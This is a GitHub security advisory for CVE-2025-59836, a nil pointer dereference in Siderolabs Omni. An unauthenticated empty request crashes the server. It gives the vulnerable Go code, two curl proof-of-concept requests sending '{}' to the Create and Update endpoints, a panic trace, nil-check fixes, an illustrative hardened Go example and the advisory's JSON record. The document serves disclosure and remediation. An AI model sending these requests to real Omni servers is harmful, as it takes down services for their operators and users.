GHSA-4P3P-CR38-V5XP

Vulnerability from github – Published: 2025-10-13 19:59 – Updated: 2025-11-05 22:07
Summary
Omni is Vulnerable to DoS via Empty Create/Update Resource Requests
Details

Summary

A nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.

Details

The vulnerability exists in the isSensitiveSpec function, which calls grpcomni.CreateResource without checking whether the resource's Metadata field is nil. An empty request body decodes to a Resource whose Metadata pointer is nil (protobuf message fields are pointers in Go and stay nil when omitted), so when CreateResource reads resource.Metadata.Version the Go runtime raises a nil pointer dereference panic. Nothing on the request path recovers the panic, so the whole Omni process exits; that process exit is the denial of service. Go reports the fault as SIGSEGV, as the trace in the PoC below shows.

Vulnerable Code

The isSensitiveSpec function in /src/internal/backend/server.go:

func isSensitiveSpec(resource *resapi.Resource) bool {
    res, err := grpcomni.CreateResource(resource)  // No nil check on resource.Metadata
    if err != nil {
        return false
    }
    // ... rest of function
}

The CreateResource function expects resource.Metadata to be non-nil:

func CreateResource(resource *resources.Resource) (cosiresource.Resource, error) {
    if resource.Metadata.Version == "" {  // PANIC: nil pointer dereference
        resource.Metadata.Version = "1"
    }
    // ... rest of function
}

The ResourceServer.Update handler has the same issue: it also passes in.Resource straight to CreateResource, which expects resource.Metadata to be non-nil:

func (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) {
    // ... validation code ...
    obj, err := CreateResource(in.Resource)  // Same vulnerability here
    if err != nil {
        return nil, err
    }
    // ... rest of function
}

Affected Endpoints

  • resourceServerCreate - Create Resource API endpoint
  • resourceServerUpdate - Update Resource API endpoint

Both endpoints call isSensitiveSpec which triggers the vulnerability when processing empty resources.

PoC

Send empty resource requests to the affected API endpoints:

# Create endpoint
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Create" \
  -H "Content-Type: application/json" \
  -d '{}'

# Update endpoint  
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Update" \
  -H "Content-Type: application/json" \
  -d '{}'

Expected Result: Server panic with segmentation fault:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]

goroutine 3305 [running]:
github.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?)
        /src/internal/backend/grpc/resource.go:364 +0x20

Impact

  • Vulnerability Type: Denial of Service (DoS)
  • Severity: High - Complete API server crash requiring manual restart if no restart policy is applied. (This is the reporter's rating; the GitHub-reviewed record below carries CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L, availability impact Low, and a Moderate severity.)
  • Authentication: None required (unauthenticated)
  • Complexity: Low (simple HTTP request)

Mitigation

Add nil checks in the isSensitiveSpec function, as in the reporter's suggested fix below. Because Update also passes in.Resource to CreateResource directly, the same guard belongs in CreateResource itself (or at every call site) so that no path reaches resource.Metadata.Version with a nil Metadata. The fixed releases are 1.0.2 and 1.1.5 per the affected ranges in the record below.

func isSensitiveSpec(resource *resapi.Resource) bool {
    if resource == nil || resource.Metadata == nil {
        return false
    }
    res, err := grpcomni.CreateResource(resource)
    if err != nil {
        return false
    }
    // ... rest of function
}
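The vulnerable and hardened forms of the CreateResource pattern side by side, as an added example that is not Omni's code. The Metadata and Resource types are hypothetical stand-ins for the generated protobuf messages the advisory names (resapi.Resource / resources.Resource), and callRecovering is a stand-in for a gRPC recovery interceptor. It shows that an empty request (nil Metadata) panics on the unchecked path and returns an error on the checked one, and that putting the guard inside the constructor covers the direct call from Update as well as the call from isSensitiveSpec.

```go
package main

import (
	"errors"
	"fmt"
)

// Metadata and Resource are hypothetical stand-ins for the generated protobuf
// types the advisory refers to; they are not Omni's definitions. As in
// protobuf-go, a message-typed field is a pointer that stays nil when the
// request body omits it, which is exactly what an empty "{}" request produces.
type Metadata struct {
	Namespace string
	Type      string
	ID        string
	Version   string
}

type Resource struct {
	Metadata *Metadata
	Spec     string
}

// createResourceUnchecked reproduces the vulnerable pattern: the Metadata
// pointer is dereferenced before anything checks that it is non-nil.
func createResourceUnchecked(resource *Resource) (*Resource, error) {
	if resource.Metadata.Version == "" { // nil pointer dereference when Metadata is nil
		resource.Metadata.Version = "1"
	}
	return resource, nil
}

// errNoMetadata is what the hardened path returns instead of panicking; a gRPC
// handler would map it to an InvalidArgument status.
var errNoMetadata = errors.New("resource metadata is required")

// createResourceChecked is the hardened form. The guard lives inside the
// function rather than at one call site, so every caller (Create, Update and
// the sensitivity check) is covered.
func createResourceChecked(resource *Resource) (*Resource, error) {
	if resource == nil || resource.Metadata == nil {
		return nil, errNoMetadata
	}
	if resource.Metadata.Version == "" {
		resource.Metadata.Version = "1"
	}
	return resource, nil
}

// callRecovering runs fn and converts a panic into an ordinary error, reporting
// whether one occurred. This is the defence-in-depth half: a recovery
// interceptor at the server boundary does the same job, so one malformed
// request fails by itself instead of taking the whole process down.
func callRecovering(fn func() error) (panicked bool, err error) {
	defer func() {
		if r := recover(); r != nil {
			panicked = true
			err = fmt.Errorf("recovered panic: %v", r)
		}
	}()
	return false, fn()
}

func main() {
	empty := &Resource{} // what an empty "{}" request decodes to (constructed input)

	panicked, err := callRecovering(func() error {
		_, e := createResourceUnchecked(empty)
		return e
	})
	fmt.Printf("unchecked: panicked=%v err=%v\n", panicked, err)

	panicked, err = callRecovering(func() error {
		_, e := createResourceChecked(empty)
		return e
	})
	fmt.Printf("checked:   panicked=%v err=%v\n", panicked, err)

	valid := &Resource{Metadata: &Metadata{Namespace: "default", Type: "example", ID: "demo"}}
	out, _ := createResourceChecked(valid)
	fmt.Printf("valid:     version defaulted to %q\n", out.Metadata.Version)
}
```

Run it with `go run .`; the first call is only survivable because callRecovering catches the panic, which is the point: without a recover at the server boundary, the unchecked path is a process crash per request.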

Credits

  • @1c3t0rm
  • @nicomda

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.4"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0-beta.0"
            },
            {
              "fixed": "1.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59836"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-13T19:59:17Z",
    "nvd_published_at": "2025-10-13T21:15:34Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.\n\n## Details\n\nThe vulnerability exists in the `isSensitiveSpec` function which calls `grpcomni.CreateResource` without checking if the resource\u0027s metadata field is nil. When a resource is created with an empty `Metadata` field, the `CreateResource` function attempts to access `resource.Metadata.Version` causing a segmentation fault.\n\n### Vulnerable Code\n\nThe `isSensitiveSpec` function in `/src/internal/backend/server.go`:\n\n```go\nfunc isSensitiveSpec(resource *resapi.Resource) bool {\n    res, err := grpcomni.CreateResource(resource)  // No nil check on resource.Metadata\n    if err != nil {\n        return false\n    }\n    // ... rest of function\n}\n```\n\nThe `CreateResource` function expects `resource.Metadata` to be non-nil:\n\n```go\nfunc CreateResource(resource *resources.Resource) (cosiresource.Resource, error) {\n    if resource.Metadata.Version == \"\" {  // PANIC: nil pointer dereference\n        resource.Metadata.Version = \"1\"\n    }\n    // ... rest of function\n}\n```\n\nThe `UpdateResource` function has the same issue - it also calls `CreateResource` internally and expects `resource.Metadata` to be non-nil:\n\n```go\nfunc (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) {\n    // ... validation code ...\n    obj, err := CreateResource(in.Resource)  // Same vulnerability here\n    if err != nil {\n        return nil, err\n    }\n    // ... rest of function\n}\n```\n\n### Affected Endpoints\n\n- `resourceServerCreate` - Create Resource API endpoint\n- `resourceServerUpdate` - Update Resource API endpoint\n\nBoth endpoints call `isSensitiveSpec` which triggers the vulnerability when processing empty resources.\n\n## PoC\n\nSend empty resource requests to the affected API endpoints:\n\n```bash\n# Create endpoint\ncurl -X POST \"https://your-omni-instance/api/omni.resources.ResourceService/Create\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{}\u0027\n\n# Update endpoint  \ncurl -X POST \"https://your-omni-instance/api/omni.resources.ResourceService/Update\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{}\u0027\n```\n\n**Expected Result**: Server panic with segmentation fault:\n\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]\n\ngoroutine 3305 [running]:\ngithub.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?)\n        /src/internal/backend/grpc/resource.go:364 +0x20\n```\n\n## Impact\n\n- **Vulnerability Type**: Denial of Service (DoS)\n- **Severity**: High - Complete API server crash requiring manual restart if no restart policy is applied.\n- **Authentication**: None required (unauthenticated)\n- **Complexity**: Low (simple HTTP request)\n\n## Mitigation\n\nAdd nil checks in the `isSensitiveSpec` function:\n\n```go\nfunc isSensitiveSpec(resource *resapi.Resource) bool {\n    if resource == nil || resource.Metadata == nil {\n        return false\n    }\n    res, err := grpcomni.CreateResource(resource)\n    if err != nil {\n        return false\n    }\n    // ... rest of function\n}\n```\n\n## Credits\n- @1c3t0rm\n- @nicomda",
  "id": "GHSA-4p3p-cr38-v5xp",
  "modified": "2025-11-05T22:07:29Z",
  "published": "2025-10-13T19:59:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/security/advisories/GHSA-4p3p-cr38-v5xp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59836"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1396083f766a1b0380e9949968d7fc17b7afecaa"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1fd954af64985a8b3dbf5b11deddbf7cd953f5ae"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siderolabs/omni"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-4021"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Omni is Vulnerable to DoS via Empty Create/Update Resource Requests"
}

